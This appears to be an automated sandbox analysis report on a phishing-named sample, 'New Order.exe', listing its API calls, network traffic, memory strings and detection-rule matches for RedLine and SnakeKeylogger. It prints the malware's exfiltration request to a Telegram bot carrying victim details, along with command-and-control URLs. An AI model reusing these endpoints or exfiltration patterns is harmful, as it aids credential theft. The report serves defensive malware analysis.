Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0032DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, |
0_2_0032DBBE |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002FC2A2 FindFirstFileExW, |
0_2_002FC2A2 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_003368EE FindFirstFileW,FindClose, |
0_2_003368EE |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0033698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, |
0_2_0033698F |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0032D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, |
0_2_0032D076 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0032D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, |
0_2_0032D3A9 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00339642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00339642 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0033979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_0033979D |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00339B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, |
0_2_00339B2B |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00335C97 FindFirstFileW,FindNextFileW,FindClose, |
0_2_00335C97 |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2026/07/2024%20/%2001:41:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://lenteraandalan.com |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://mail.lenteraandalan.com |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F74000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enp |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E54000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E54000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/lB |
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/p |
Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 0.2.New Order.exe.14e0000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000000.00000002.1263248786.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000002.00000002.3707765175.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002C8060 |
0_2_002C8060 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00332046 |
0_2_00332046 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00328298 |
0_2_00328298 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002FE4FF |
0_2_002FE4FF |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002F676B |
0_2_002F676B |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00354873 |
0_2_00354873 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002ECAA0 |
0_2_002ECAA0 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002CCAF0 |
0_2_002CCAF0 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002DCC39 |
0_2_002DCC39 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002F6DD9 |
0_2_002F6DD9 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002DD065 |
0_2_002DD065 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002C90BC |
0_2_002C90BC |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002DB119 |
0_2_002DB119 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002C91C0 |
0_2_002C91C0 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002E1394 |
0_2_002E1394 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002E1706 |
0_2_002E1706 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002E781B |
0_2_002E781B |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002C7920 |
0_2_002C7920 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002D997D |
0_2_002D997D |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002E19B0 |
0_2_002E19B0 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002E7A4A |
0_2_002E7A4A |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002E1C77 |
0_2_002E1C77 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002E7CA7 |
0_2_002E7CA7 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00313CD5 |
0_2_00313CD5 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0034BE44 |
0_2_0034BE44 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002F9EEE |
0_2_002F9EEE |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002E1F32 |
0_2_002E1F32 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002CBF40 |
0_2_002CBF40 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_014C3620 |
0_2_014C3620 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00408C60 |
2_2_00408C60 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_0040DC11 |
2_2_0040DC11 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00407C3F |
2_2_00407C3F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00418CCC |
2_2_00418CCC |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00406CA0 |
2_2_00406CA0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_004028B0 |
2_2_004028B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_0041A4BE |
2_2_0041A4BE |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00418244 |
2_2_00418244 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00401650 |
2_2_00401650 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00402F20 |
2_2_00402F20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_004193C4 |
2_2_004193C4 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00418788 |
2_2_00418788 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00402F89 |
2_2_00402F89 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_00402B90 |
2_2_00402B90 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_004073A0 |
2_2_004073A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02A91290 |
2_2_02A91290 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02A912C0 |
2_2_02A912C0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02A911D0 |
2_2_02A911D0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_069543EB |
2_2_069543EB |
Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 0.2.New Order.exe.14e0000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE |
